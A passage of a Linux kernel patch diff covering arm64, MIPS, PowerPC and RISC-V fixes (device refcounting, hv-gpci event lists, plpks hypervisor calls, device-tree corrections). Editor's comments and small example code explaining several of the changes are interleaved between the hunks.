++	return (esr & ESR_ELx_FSC_TYPE) == ESR_ELx_FSC_FAULT;
++}
++
+ static void __do_kernel_fault(unsigned long addr, unsigned long esr,
+ 			      struct pt_regs *regs)
+ {
+@@ -385,7 +390,8 @@ static void __do_kernel_fault(unsigned long addr, unsigned long esr,
+ 	} else if (addr < PAGE_SIZE) {
+ 		msg = "NULL pointer dereference";
+ 	} else {
+-		if (kfence_handle_page_fault(addr, esr & ESR_ELx_WNR, regs))
++		if (is_translation_fault(esr) &&
++		    kfence_handle_page_fault(addr, esr & ESR_ELx_WNR, regs))
+ 			return;
+ 
+ 		msg = "paging request";
+diff --git a/arch/mips/bcm63xx/clk.c b/arch/mips/bcm63xx/clk.c
+index 6e6756e8fa0a9..86a6e25908664 100644
+--- a/arch/mips/bcm63xx/clk.c
++++ b/arch/mips/bcm63xx/clk.c
+@@ -361,6 +361,8 @@ static struct clk clk_periph = {
+  */
+ int clk_enable(struct clk *clk)
+ {
++	if (!clk)
++		return 0;
+ 	mutex_lock(&clocks_mutex);
+ 	clk_enable_unlocked(clk);
+ 	mutex_unlock(&clocks_mutex);
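/*
 * [Editor's sketch, not part of the patch] The NULL check added above
 * brings this legacy implementation in line with the wider clk API
 * convention that a NULL struct clk is a valid "no clock" handle on which
 * every operation succeeds as a no-op. That convention is what makes
 * optional-clock consumers like the following safe (the "periph" name and
 * demo function are hypothetical):
 */
#include <linux/clk.h>
#include <linux/device.h>
#include <linux/err.h>

static int demo_enable_optional_clk(struct device *dev)
{
	/* Returns NULL, not an error pointer, when the clock is absent. */
	struct clk *clk = devm_clk_get_optional(dev, "periph");

	if (IS_ERR(clk))
		return PTR_ERR(clk);

	return clk_prepare_enable(clk);	/* no-op (returns 0) when clk is NULL */
}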
+diff --git a/arch/mips/boot/dts/ingenic/ci20.dts b/arch/mips/boot/dts/ingenic/ci20.dts
+index 37c46720c719a..f38c39572a9e8 100644
+--- a/arch/mips/boot/dts/ingenic/ci20.dts
++++ b/arch/mips/boot/dts/ingenic/ci20.dts
+@@ -438,7 +438,7 @@
+ 		ingenic,nemc-tAW = <50>;
+ 		ingenic,nemc-tSTRV = <100>;
+ 
+-		reset-gpios = <&gpf 12 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&gpf 12 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&eth0_power>;
+ 
+ 		interrupt-parent = <&gpe>;
+diff --git a/arch/mips/cavium-octeon/executive/cvmx-helper-board.c b/arch/mips/cavium-octeon/executive/cvmx-helper-board.c
+index d09d0769f5496..0fd9ac76eb742 100644
+--- a/arch/mips/cavium-octeon/executive/cvmx-helper-board.c
++++ b/arch/mips/cavium-octeon/executive/cvmx-helper-board.c
+@@ -211,7 +211,7 @@ union cvmx_helper_link_info __cvmx_helper_board_link_get(int ipd_port)
+ {
+ 	union cvmx_helper_link_info result;
+ 
+-	WARN(!octeon_is_simulation(),
++	WARN_ONCE(!octeon_is_simulation(),
+ 	     "Using deprecated link status - please update your DT");
+ 
+ 	/* Unless we fix it later, all links are defaulted to down */
+diff --git a/arch/mips/cavium-octeon/executive/cvmx-helper.c b/arch/mips/cavium-octeon/executive/cvmx-helper.c
+index 6f49fd9be1f3c..9abfc4bf9bd83 100644
+--- a/arch/mips/cavium-octeon/executive/cvmx-helper.c
++++ b/arch/mips/cavium-octeon/executive/cvmx-helper.c
+@@ -1096,7 +1096,7 @@ union cvmx_helper_link_info cvmx_helper_link_get(int ipd_port)
+ 		if (index == 0)
+ 			result = __cvmx_helper_rgmii_link_get(ipd_port);
+ 		else {
+-			WARN(1, "Using deprecated link status - please update your DT");
++			WARN_ONCE(1, "Using deprecated link status - please update your DT");
+ 			result.s.full_duplex = 1;
+ 			result.s.link_up = 1;
+ 			result.s.speed = 1000;
+diff --git a/arch/mips/kernel/vpe-cmp.c b/arch/mips/kernel/vpe-cmp.c
+index e673603e11e5d..92140edb3ce3e 100644
+--- a/arch/mips/kernel/vpe-cmp.c
++++ b/arch/mips/kernel/vpe-cmp.c
+@@ -75,7 +75,6 @@ ATTRIBUTE_GROUPS(vpe);
+ 
+ static void vpe_device_release(struct device *cd)
+ {
+-	kfree(cd);
+ }
+ 
+ static struct class vpe_class = {
+@@ -157,6 +156,7 @@ out_dev:
+ 	device_del(&vpe_device);
+ 
+ out_class:
++	put_device(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 
+ out_chrdev:
+@@ -169,7 +169,7 @@ void __exit vpe_module_exit(void)
+ {
+ 	struct vpe *v, *n;
+ 
+-	device_del(&vpe_device);
++	device_unregister(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 	unregister_chrdev(major, VPE_MODULE_NAME);
+ 
+diff --git a/arch/mips/kernel/vpe-mt.c b/arch/mips/kernel/vpe-mt.c
+index bad6b0891b2b5..84a82b551ec35 100644
+--- a/arch/mips/kernel/vpe-mt.c
++++ b/arch/mips/kernel/vpe-mt.c
+@@ -313,7 +313,6 @@ ATTRIBUTE_GROUPS(vpe);
+ 
+ static void vpe_device_release(struct device *cd)
+ {
+-	kfree(cd);
+ }
+ 
+ static struct class vpe_class = {
+@@ -497,6 +496,7 @@ out_dev:
+ 	device_del(&vpe_device);
+ 
+ out_class:
++	put_device(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 
+ out_chrdev:
+@@ -509,7 +509,7 @@ void __exit vpe_module_exit(void)
+ {
+ 	struct vpe *v, *n;
+ 
+-	device_del(&vpe_device);
++	device_unregister(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 	unregister_chrdev(major, VPE_MODULE_NAME);
+ 
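/*
 * [Editor's sketch, not part of the patch] The vpe-cmp.c and vpe-mt.c
 * fixes above follow the driver-core refcount rules: device_del() only
 * removes the device, while device_unregister() is device_del() plus
 * put_device(), and a failed registration still holds the reference taken
 * at initialization, which only put_device() releases. Dropping that
 * reference is also what invokes the release callback, which is why the
 * emptied vpe_device_release() must no longer kfree() the statically
 * allocated vpe_device. A generic sketch of the same pattern:
 */
#include <linux/device.h>

static int demo_register(struct device *dev)
{
	int err = device_register(dev);	/* device_initialize() + device_add() */

	if (err) {
		put_device(dev);	/* drop the initialization reference */
		return err;
	}
	return 0;
}
/* ...and tear down with device_unregister(dev), not a bare device_del(dev). */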
+diff --git a/arch/mips/ralink/of.c b/arch/mips/ralink/of.c
+index ea8072acf8d94..01c132bc33d54 100644
+--- a/arch/mips/ralink/of.c
++++ b/arch/mips/ralink/of.c
+@@ -21,6 +21,7 @@
+ #include <asm/bootinfo.h>
+ #include <asm/addrspace.h>
+ #include <asm/prom.h>
++#include <asm/mach-ralink/ralink_regs.h>
+ 
+ #include "common.h"
+ 
+@@ -81,7 +82,8 @@ static int __init plat_of_setup(void)
+ 	__dt_register_buses(soc_info.compatible, "palmbus");
+ 
+ 	/* make sure that the reset controller is setup early */
+-	ralink_rst_init();
++	if (ralink_soc != MT762X_SOC_MT7621AT)
++		ralink_rst_init();
+ 
+ 	return 0;
+ }
+diff --git a/arch/powerpc/boot/dts/turris1x.dts b/arch/powerpc/boot/dts/turris1x.dts
+index 045af668e9284..e9cda34a140e0 100644
+--- a/arch/powerpc/boot/dts/turris1x.dts
++++ b/arch/powerpc/boot/dts/turris1x.dts
+@@ -69,6 +69,20 @@
+ 				interrupt-parent = <&gpio>;
+ 				interrupts = <12 IRQ_TYPE_LEVEL_LOW>, /* GPIO12 - ALERT pin */
+ 					     <13 IRQ_TYPE_LEVEL_LOW>; /* GPIO13 - CRIT pin */
++				#address-cells = <1>;
++				#size-cells = <0>;
++
++				/* Local temperature sensor (SA56004ED internal) */
++				channel@0 {
++					reg = <0>;
++					label = "board";
++				};
++
++				/* Remote temperature sensor (D+/D- connected to P2020 CPU Temperature Diode) */
++				channel@1 {
++					reg = <1>;
++					label = "cpu";
++				};
+ 			};
+ 
+ 			/* DDR3 SPD/EEPROM */
+diff --git a/arch/powerpc/include/asm/hvcall.h b/arch/powerpc/include/asm/hvcall.h
+index 8abae463f6c12..95fd7f9485d55 100644
+--- a/arch/powerpc/include/asm/hvcall.h
++++ b/arch/powerpc/include/asm/hvcall.h
+@@ -79,7 +79,7 @@
+ #define H_NOT_ENOUGH_RESOURCES -44
+ #define H_R_STATE       -45
+ #define H_RESCINDED     -46
+-#define H_P1		-54
++#define H_ABORTED	-54
+ #define H_P2		-55
+ #define H_P3		-56
+ #define H_P4		-57
+@@ -100,7 +100,6 @@
+ #define H_COP_HW	-74
+ #define H_STATE		-75
+ #define H_IN_USE	-77
+-#define H_ABORTED	-78
+ #define H_UNSUPPORTED_FLAG_START	-256
+ #define H_UNSUPPORTED_FLAG_END		-511
+ #define H_MULTI_THREADS_ACTIVE	-9005
+diff --git a/arch/powerpc/perf/callchain.c b/arch/powerpc/perf/callchain.c
+index 082f6d0308a47..8718289c051dd 100644
+--- a/arch/powerpc/perf/callchain.c
++++ b/arch/powerpc/perf/callchain.c
+@@ -61,6 +61,7 @@ perf_callchain_kernel(struct perf_callchain_entry_ctx *entry, struct pt_regs *re
+ 		next_sp = fp[0];
+ 
+ 		if (next_sp == sp + STACK_INT_FRAME_SIZE &&
++		    validate_sp(sp, current, STACK_INT_FRAME_SIZE) &&
+ 		    fp[STACK_FRAME_MARKER] == STACK_FRAME_REGS_MARKER) {
+ 			/*
+ 			 * This looks like an interrupt frame for an
+diff --git a/arch/powerpc/perf/hv-gpci-requests.h b/arch/powerpc/perf/hv-gpci-requests.h
+index 8965b4463d433..5e86371a20c78 100644
+--- a/arch/powerpc/perf/hv-gpci-requests.h
++++ b/arch/powerpc/perf/hv-gpci-requests.h
+@@ -79,6 +79,7 @@ REQUEST(__field(0,	8,	partition_id)
+ )
+ #include I(REQUEST_END)
+ 
++#ifdef ENABLE_EVENTS_COUNTERINFO_V6
+ /*
+  * Not available for counter_info_version >= 0x8, use
+  * run_instruction_cycles_by_partition(0x100) instead.
+@@ -92,6 +93,7 @@ REQUEST(__field(0,	8,	partition_id)
+ 	__count(0x10,	8,	cycles)
+ )
+ #include I(REQUEST_END)
++#endif
+ 
+ #define REQUEST_NAME system_performance_capabilities
+ #define REQUEST_NUM 0x40
+@@ -103,6 +105,7 @@ REQUEST(__field(0,	1,	perf_collect_privileged)
+ )
+ #include I(REQUEST_END)
+ 
++#ifdef ENABLE_EVENTS_COUNTERINFO_V6
+ #define REQUEST_NAME processor_bus_utilization_abc_links
+ #define REQUEST_NUM 0x50
+ #define REQUEST_IDX_KIND "hw_chip_id=?"
+@@ -194,6 +197,7 @@ REQUEST(__field(0,	4,	phys_processor_idx)
+ 	__count(0x28,	8,	instructions_completed)
+ )
+ #include I(REQUEST_END)
++#endif
+ 
+ /* Processor_core_power_mode (0x95) skipped, no counters */
+ /* Affinity_domain_information_by_virtual_processor (0xA0) skipped,
+diff --git a/arch/powerpc/perf/hv-gpci.c b/arch/powerpc/perf/hv-gpci.c
+index 5eb60ed5b5e8a..7ff8ff3509f5f 100644
+--- a/arch/powerpc/perf/hv-gpci.c
++++ b/arch/powerpc/perf/hv-gpci.c
+@@ -70,9 +70,9 @@ static const struct attribute_group format_group = {
+ 	.attrs = format_attrs,
+ };
+ 
+-static const struct attribute_group event_group = {
++static struct attribute_group event_group = {
+ 	.name  = "events",
+-	.attrs = hv_gpci_event_attrs,
++	/* .attrs is set in init */
+ };
+ 
+ #define HV_CAPS_ATTR(_name, _format)				\
+@@ -330,6 +330,7 @@ static int hv_gpci_init(void)
+ 	int r;
+ 	unsigned long hret;
+ 	struct hv_perf_caps caps;
++	struct hv_gpci_request_buffer *arg;
+ 
+ 	hv_gpci_assert_offsets_correct();
+ 
+@@ -353,6 +354,36 @@ static int hv_gpci_init(void)
+ 	/* sampling not supported */
+ 	h_gpci_pmu.capabilities |= PERF_PMU_CAP_NO_INTERRUPT;
+ 
++	arg = (void *)get_cpu_var(hv_gpci_reqb);
++	memset(arg, 0, HGPCI_REQ_BUFFER_SIZE);
++
++	/*
++	 * hcall H_GET_PERF_COUNTER_INFO populates the output
++	 * counter_info_version value based on the system hypervisor.
++	 * Pass the counter request 0x10 corresponds to request type
++	 * 'Dispatch_timebase_by_processor', to get the supported
++	 * counter_info_version.
++	 */
++	arg->params.counter_request = cpu_to_be32(0x10);
++
++	r = plpar_hcall_norets(H_GET_PERF_COUNTER_INFO,
++			virt_to_phys(arg), HGPCI_REQ_BUFFER_SIZE);
++	if (r) {
++		pr_devel("hcall failed, can't get supported counter_info_version: 0x%x\n", r);
++		arg->params.counter_info_version_out = 0x8;
++	}
++
++	/*
++	 * Use counter_info_version_out value to assign
++	 * required hv-gpci event list.
++	 */
++	if (arg->params.counter_info_version_out >= 0x8)
++		event_group.attrs = hv_gpci_event_attrs;
++	else
++		event_group.attrs = hv_gpci_event_attrs_v6;
++
++	put_cpu_var(hv_gpci_reqb);
++
+ 	r = perf_pmu_register(&h_gpci_pmu, h_gpci_pmu.name, -1);
+ 	if (r)
+ 		return r;
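/*
 * [Editor's note, not part of the patch] get_cpu_var(hv_gpci_reqb) above
 * disables preemption while the per-CPU request buffer is in use, so the
 * buffer cannot be reused from another context before the hcall returns;
 * put_cpu_var() re-enables preemption once counter_info_version_out has
 * been consumed.
 */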
+diff --git a/arch/powerpc/perf/hv-gpci.h b/arch/powerpc/perf/hv-gpci.h
+index 4d108262bed79..c72020912dea5 100644
+--- a/arch/powerpc/perf/hv-gpci.h
++++ b/arch/powerpc/perf/hv-gpci.h
+@@ -26,6 +26,7 @@ enum {
+ #define REQUEST_FILE "../hv-gpci-requests.h"
+ #define NAME_LOWER hv_gpci
+ #define NAME_UPPER HV_GPCI
++#define ENABLE_EVENTS_COUNTERINFO_V6
+ #include "req-gen/perf.h"
+ #undef REQUEST_FILE
+ #undef NAME_LOWER
+diff --git a/arch/powerpc/perf/req-gen/perf.h b/arch/powerpc/perf/req-gen/perf.h
+index fa9bc804e67af..6b2a59fefffa7 100644
+--- a/arch/powerpc/perf/req-gen/perf.h
++++ b/arch/powerpc/perf/req-gen/perf.h
+@@ -139,6 +139,26 @@ PMU_EVENT_ATTR_STRING(							\
+ #define REQUEST_(r_name, r_value, r_idx_1, r_fields)			\
+ 	r_fields
+ 
++/* Generate event list for platforms with counter_info_version 0x6 or below */
++static __maybe_unused struct attribute *hv_gpci_event_attrs_v6[] = {
++#include REQUEST_FILE
++	NULL
++};
++
++/*
++ * Based on getPerfCountInfo v1.018 documentation, some of the hv-gpci
++ * events were deprecated for platform firmware that supports
++ * counter_info_version 0x8 or above.
++ * Those deprecated events are still part of platform firmware that
++ * supports counter_info_version 0x6 and below. As per the getPerfCountInfo
++ * v1.018 documentation, there is no counter_info_version 0x7.
++ * Undefine the macro ENABLE_EVENTS_COUNTERINFO_V6 to disable the addition of
++ * deprecated events to the "hv_gpci_event_attrs" attribute group on platforms
++ * that support counter_info_version 0x8 or above.
++ */
++#undef ENABLE_EVENTS_COUNTERINFO_V6
++
++/* Generate event list for platforms with counter_info_version 0x8 or above */
+ static __maybe_unused struct attribute *hv_gpci_event_attrs[] = {
+ #include REQUEST_FILE
+ 	NULL
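/*
 * [Editor's sketch, not part of the patch] The two arrays above come from
 * expanding the same REQUEST_FILE twice: once with
 * ENABLE_EVENTS_COUNTERINFO_V6 defined (full list including the deprecated
 * events) and once after the #undef (trimmed list). Reduced to a
 * self-contained, hypothetical example of the same include-twice idiom
 * (the file name events.def and the EVENT()/ENABLE_LEGACY names are made
 * up):
 *
 *	-- events.def --
 *	EVENT(cycles)
 *	#ifdef ENABLE_LEGACY
 *	EVENT(legacy_cycles)	// dropped on newer firmware
 *	#endif
 */
#define ENABLE_LEGACY
#define EVENT(name) #name,
static const char *attrs_legacy[] = {
#include "events.def"
	NULL
};
#undef EVENT
#undef ENABLE_LEGACY

#define EVENT(name) #name,
static const char *attrs_modern[] = {
#include "events.def"
	NULL
};
#undef EVENT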
+diff --git a/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c b/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c
+index 48038aaedbd36..2875c206ac0f8 100644
+--- a/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c
++++ b/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c
+@@ -531,6 +531,7 @@ static int mpc52xx_lpbfifo_probe(struct platform_device *op)
+  err_bcom_rx_irq:
+ 	bcom_gen_bd_rx_release(lpbfifo.bcom_rx_task);
+  err_bcom_rx:
++	free_irq(lpbfifo.irq, &lpbfifo);
+  err_irq:
+ 	iounmap(lpbfifo.regs);
+ 	lpbfifo.regs = NULL;
+diff --git a/arch/powerpc/platforms/83xx/mpc832x_rdb.c b/arch/powerpc/platforms/83xx/mpc832x_rdb.c
+index e12cb44e717f1..caa96edf0e72a 100644
+--- a/arch/powerpc/platforms/83xx/mpc832x_rdb.c
++++ b/arch/powerpc/platforms/83xx/mpc832x_rdb.c
+@@ -107,7 +107,7 @@ static int __init of_fsl_spi_probe(char *type, char *compatible, u32 sysclk,
+ 
+ 		goto next;
+ unreg:
+-		platform_device_del(pdev);
++		platform_device_put(pdev);
+ err:
+ 		pr_err("%pOF: registration failed\n", np);
+ next:
+diff --git a/arch/powerpc/platforms/pseries/eeh_pseries.c b/arch/powerpc/platforms/pseries/eeh_pseries.c
+index 8e40ccac0f44e..e5a58a9b2fe9f 100644
+--- a/arch/powerpc/platforms/pseries/eeh_pseries.c
++++ b/arch/powerpc/platforms/pseries/eeh_pseries.c
+@@ -848,16 +848,7 @@ static int __init eeh_pseries_init(void)
+ 	}
+ 
+ 	/* Initialize error log size */
+-	eeh_error_buf_size = rtas_token("rtas-error-log-max");
+-	if (eeh_error_buf_size == RTAS_UNKNOWN_SERVICE) {
+-		pr_info("%s: unknown EEH error log size\n",
+-			__func__);
+-		eeh_error_buf_size = 1024;
+-	} else if (eeh_error_buf_size > RTAS_ERROR_LOG_MAX) {
+-		pr_info("%s: EEH error log size %d exceeds the maximal %d\n",
+-			__func__, eeh_error_buf_size, RTAS_ERROR_LOG_MAX);
+-		eeh_error_buf_size = RTAS_ERROR_LOG_MAX;
+-	}
++	eeh_error_buf_size = rtas_get_error_log_max();
+ 
+ 	/* Set EEH probe mode */
+ 	eeh_add_flag(EEH_PROBE_MODE_DEVTREE | EEH_ENABLE_IO_FOR_LOG);
+diff --git a/arch/powerpc/platforms/pseries/plpks.c b/arch/powerpc/platforms/pseries/plpks.c
+index f4b5b5a64db3d..63a1e1fe01851 100644
+--- a/arch/powerpc/platforms/pseries/plpks.c
++++ b/arch/powerpc/platforms/pseries/plpks.c
+@@ -75,7 +75,7 @@ static int pseries_status_to_err(int rc)
+ 	case H_FUNCTION:
+ 		err = -ENXIO;
+ 		break;
+-	case H_P1:
++	case H_PARAMETER:
+ 	case H_P2:
+ 	case H_P3:
+ 	case H_P4:
+@@ -111,7 +111,7 @@ static int pseries_status_to_err(int rc)
+ 		err = -EEXIST;
+ 		break;
+ 	case H_ABORTED:
+-		err = -EINTR;
++		err = -EIO;
+ 		break;
+ 	default:
+ 		err = -EINVAL;
+@@ -366,22 +366,24 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ {
+ 	unsigned long retbuf[PLPAR_HCALL_BUFSIZE] = { 0 };
+ 	struct plpks_auth *auth;
+-	struct label *label;
++	struct label *label = NULL;
+ 	u8 *output;
+ 	int rc;
+ 
+ 	if (var->namelen > MAX_NAME_SIZE)
+ 		return -EINVAL;
+ 
+-	auth = construct_auth(PKS_OS_OWNER);
++	auth = construct_auth(consumer);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+-	label = construct_label(var->component, var->os, var->name,
+-				var->namelen);
+-	if (IS_ERR(label)) {
+-		rc = PTR_ERR(label);
+-		goto out_free_auth;
++	if (consumer == PKS_OS_OWNER) {
++		label = construct_label(var->component, var->os, var->name,
++					var->namelen);
++		if (IS_ERR(label)) {
++			rc = PTR_ERR(label);
++			goto out_free_auth;
++		}
+ 	}
+ 
+ 	output = kzalloc(maxobjsize, GFP_KERNEL);
+@@ -390,9 +392,15 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 		goto out_free_label;
+ 	}
+ 
+-	rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
+-			 virt_to_phys(label), label->size, virt_to_phys(output),
+-			 maxobjsize);
++	if (consumer == PKS_OS_OWNER)
++		rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
++				 virt_to_phys(label), label->size, virt_to_phys(output),
++				 maxobjsize);
++	else
++		rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
++				 virt_to_phys(var->name), var->namelen, virt_to_phys(output),
++				 maxobjsize);
++
+ 
+ 	if (rc != H_SUCCESS) {
+ 		pr_err("Failed to read variable %s for component %s with error %d\n",
+diff --git a/arch/powerpc/platforms/pseries/plpks.h b/arch/powerpc/platforms/pseries/plpks.h
+index c6a291367bb13..275ccd86bfb5e 100644
+--- a/arch/powerpc/platforms/pseries/plpks.h
++++ b/arch/powerpc/platforms/pseries/plpks.h
+@@ -17,7 +17,7 @@
+ #define WORLDREADABLE 0x08000000
+ #define SIGNEDUPDATE 0x01000000
+ 
+-#define PLPKS_VAR_LINUX	0x01
++#define PLPKS_VAR_LINUX	0x02
+ #define PLPKS_VAR_COMMON	0x04
+ 
+ struct plpks_var {
+diff --git a/arch/powerpc/sysdev/xive/spapr.c b/arch/powerpc/sysdev/xive/spapr.c
+index e2c8f93b535ba..e454192643910 100644
+--- a/arch/powerpc/sysdev/xive/spapr.c
++++ b/arch/powerpc/sysdev/xive/spapr.c
+@@ -439,6 +439,7 @@ static int xive_spapr_populate_irq_data(u32 hw_irq, struct xive_irq_data *data)
+ 
+ 	data->trig_mmio = ioremap(data->trig_page, 1u << data->esb_shift);
+ 	if (!data->trig_mmio) {
++		iounmap(data->eoi_mmio);
+ 		pr_err("Failed to map trigger page for irq 0x%x\n", hw_irq);
+ 		return -ENOMEM;
+ 	}
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index f51c882bf9023..e34d7809f6c9f 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -1525,9 +1525,9 @@ bpt_cmds(void)
+ 	cmd = inchar();
+ 
+ 	switch (cmd) {
+-	static const char badaddr[] = "Only kernel addresses are permitted for breakpoints\n";
+-	int mode;
+-	case 'd':	/* bd - hardware data breakpoint */
++	case 'd': {	/* bd - hardware data breakpoint */
++		static const char badaddr[] = "Only kernel addresses are permitted for breakpoints\n";
++		int mode;
+ 		if (xmon_is_ro) {
+ 			printf(xmon_ro_msg);
+ 			break;
+@@ -1560,6 +1560,7 @@ bpt_cmds(void)
+ 
+ 		force_enable_xmon();
+ 		break;
++	}
+ 
+ 	case 'i':	/* bi - hardware instr breakpoint */
+ 		if (xmon_is_ro) {
+diff --git a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi
+index 24b1cfb9a73e4..5d3e5240e33ae 100644
+--- a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi
++++ b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi
+@@ -9,7 +9,7 @@
+ 		compatible = "microchip,corepwm-rtl-v4";
+ 		reg = <0x0 0x40000000 0x0 0xF0>;
+ 		microchip,sync-update-mask = /bits/ 32 <0>;
+-		#pwm-cells = <2>;
++		#pwm-cells = <3>;
+ 		clocks = <&fabric_clk3>;
+ 		status = "disabled";
+ 	};
+diff --git a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts
+index ec7b7c2a3ce28..8ced67c3b00b2 100644
+--- a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts
++++ b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts
+@@ -37,7 +37,7 @@
+ 		status = "okay";
+ 	};
+ 
+-	ddrc_cache_hi: memory@1000000000 {
++	ddrc_cache_hi: memory@1040000000 {
+ 		device_type = "memory";
+ 		reg = <0x10 0x40000000 0x0 0x40000000>;
+ 		status = "okay";
+diff --git a/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi b/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi
+index 8545baf4d1290..39a77df489abf 100644
+--- a/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi
++++ b/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi
+@@ -13,33 +13,4 @@
+ 		#clock-cells = <0>;
+ 		clock-frequency = <125000000>;
+ 	};
+-
+-	pcie: pcie@2000000000 {
+-		compatible = "microchip,pcie-host-1.0";
+-		#address-cells = <0x3>;
+-		#interrupt-cells = <0x1>;
+-		#size-cells = <0x2>;
+-		device_type = "pci";
+-		reg = <0x20 0x0 0x0 0x8000000>, <0x0 0x43000000 0x0 0x10000>;
+-		reg-names = "cfg", "apb";
+-		bus-range = <0x0 0x7f>;
+-		interrupt-parent = <&plic>;
+-		interrupts = <119>;
+-		interrupt-map = <0 0 0 1 &pcie_intc 0>,
+-				<0 0 0 2 &pcie_intc 1>,
+-				<0 0 0 3 &pcie_intc 2>,
+-				<0 0 0 4 &pcie_intc 3>;
+-		interrupt-map-mask = <0 0 0 7>;
+-		clocks = <&fabric_clk1>, <&fabric_clk1>, <&fabric_clk3>;
+-		clock-names = "fic0", "fic1", "fic3";
+-		ranges = <0x3000000 0x0 0x8000000 0x20 0x8000000 0x0 0x80000000>;
+-		msi-parent = <&pcie>;
+-		msi-controller;
+-		status = "disabled";
+-		pcie_intc: interrupt-controller {
+-			#address-cells = <0>;
+-			#interrupt-cells = <1>;
+-			interrupt-controller;
+-		};
+-	};
+ };
+diff --git a/arch/riscv/include/asm/hugetlb.h b/arch/riscv/include/asm/hugetlb.h
+index a5c2ca1d1cd8b..ec19d6afc8965 100644
+--- a/arch/riscv/include/asm/hugetlb.h
++++ b/arch/riscv/include/asm/hugetlb.h
+@@ -5,4 +5,10 @@
+ #include <asm-generic/hugetlb.h>
+ #include <asm/page.h>
+ 
++static inline void arch_clear_hugepage_flags(struct page *page)
++{
++	clear_bit(PG_dcache_clean, &page->flags);
++}
++#define arch_clear_hugepage_flags arch_clear_hugepage_flags
++
+ #endif /* _ASM_RISCV_HUGETLB_H */
+diff --git a/arch/riscv/include/asm/io.h b/arch/riscv/include/asm/io.h
+index 92080a2279372..42497d487a174 100644
+--- a/arch/riscv/include/asm/io.h
++++ b/arch/riscv/include/asm/io.h
+@@ -135,4 +135,9 @@ __io_writes_outs(outs, u64, q, __io_pbr(), __io_paw())
+ 
+ #include <asm-generic/io.h>
+ 
++#ifdef CONFIG_MMU
++#define arch_memremap_wb(addr, size)	\
++	((__force void *)ioremap_prot((addr), (size), _PAGE_KERNEL))
++#endif
++
+ #endif /* _ASM_RISCV_IO_H */
+diff --git a/arch/riscv/include/asm/pgtable-64.h b/arch/riscv/include/asm/pgtable-64.h
+index dc42375c23571..42a042c0e13ed 100644
+--- a/arch/riscv/include/asm/pgtable-64.h
++++ b/arch/riscv/include/asm/pgtable-64.h
+@@ -25,7 +25,11 @@ extern bool pgtable_l5_enabled;
+ #define PGDIR_MASK      (~(PGDIR_SIZE - 1))
+ 
+ /* p4d is folded into pgd in case of 4-level page table */
+-#define P4D_SHIFT      39
++#define P4D_SHIFT_L3   30
++#define P4D_SHIFT_L4   39
++#define P4D_SHIFT_L5   39
++#define P4D_SHIFT      (pgtable_l5_enabled ? P4D_SHIFT_L5 : \
++		(pgtable_l4_enabled ? P4D_SHIFT_L4 : P4D_SHIFT_L3))
+ #define P4D_SIZE       (_AC(1, UL) << P4D_SHIFT)
+ #define P4D_MASK       (~(P4D_SIZE - 1))
+ 
+diff --git a/arch/riscv/kernel/entry.S b/arch/riscv/kernel/entry.S
+index 186abd146eaff..3221a9e5f3724 100644
+--- a/arch/riscv/kernel/entry.S
++++ b/arch/riscv/kernel/entry.S
+@@ -263,12 +263,11 @@ ret_from_exception:
+ #endif
+ 	bnez s0, resume_kernel
+ 
+-resume_userspace:
+ 	/* Interrupts must be disabled here so flags are checked atomically */
+ 	REG_L s0, TASK_TI_FLAGS(tp) /* current_thread_info->flags */
+ 	andi s1, s0, _TIF_WORK_MASK
+-	bnez s1, work_pending
+-
++	bnez s1, resume_userspace_slow
++resume_userspace:
+ #ifdef CONFIG_CONTEXT_TRACKING_USER
+ 	call user_enter_callable
+ #endif
+@@ -368,19 +367,12 @@ resume_kernel:
+ 	j restore_all
+ #endif
+ 
+-work_pending:
++resume_userspace_slow:
+ 	/* Enter slow path for supplementary processing */
+-	la ra, ret_from_exception
+-	andi s1, s0, _TIF_NEED_RESCHED
+-	bnez s1, work_resched
+-work_notifysig:
+-	/* Handle pending signals and notify-resume requests */
+-	csrs CSR_STATUS, SR_IE /* Enable interrupts for do_notify_resume() */
+ 	move a0, sp /* pt_regs */
+ 	move a1, s0 /* current_thread_info->flags */
+-	tail do_notify_resume
+-work_resched:
+-	tail schedule
++	call do_work_pending
++	j resume_userspace
+ 
+ /* Slow paths for ptrace. */
+ handle_syscall_trace_enter:
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index 5c591123c4409..bfb2afa4135f8 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -313,19 +313,27 @@ static void do_signal(struct pt_regs *regs)
+ }
+ 
+ /*
+- * notification of userspace execution resumption
+- * - triggered by the _TIF_WORK_MASK flags
++ * Handle any pending work on the resume-to-userspace path, as indicated by
